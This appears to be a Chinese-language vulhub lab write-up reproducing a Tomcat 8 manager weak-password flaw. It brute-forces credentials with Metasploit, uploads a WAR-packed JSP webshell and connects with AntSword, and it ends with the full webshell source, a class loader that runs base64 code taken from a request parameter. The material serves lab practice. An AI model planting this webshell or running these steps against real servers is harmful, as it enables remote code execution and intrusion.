vulhub Tomcat8漏洞復現

搭建一下Tomcat8這個漏洞的環境

?

查看端口發現是8080端口開放

?

可以看到環境已經搭建好了

?

嘗試登錄問題頁面，發現需要輸入密碼http://...:8080/manager/html

?

用msf

?

?

得到弱口令

?

成功登入后臺

?

此處可上傳文件，嘗試上傳webshell

?

上傳jsp一句話木馬，打包為war格式

上傳出現報錯，403是無權訪問不代表沒有

?

發現已經上傳上去了

?

訪問該目錄，未找到shell.jsp

?

嘗試用命令去打包war包，再次訪問，成功

?

利用蟻劍去連接

?

?

?<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}%><%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}%> #一句話木馬

總結

以上是生活随笔為你收集整理的vulhub Tomcat8漏洞复现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。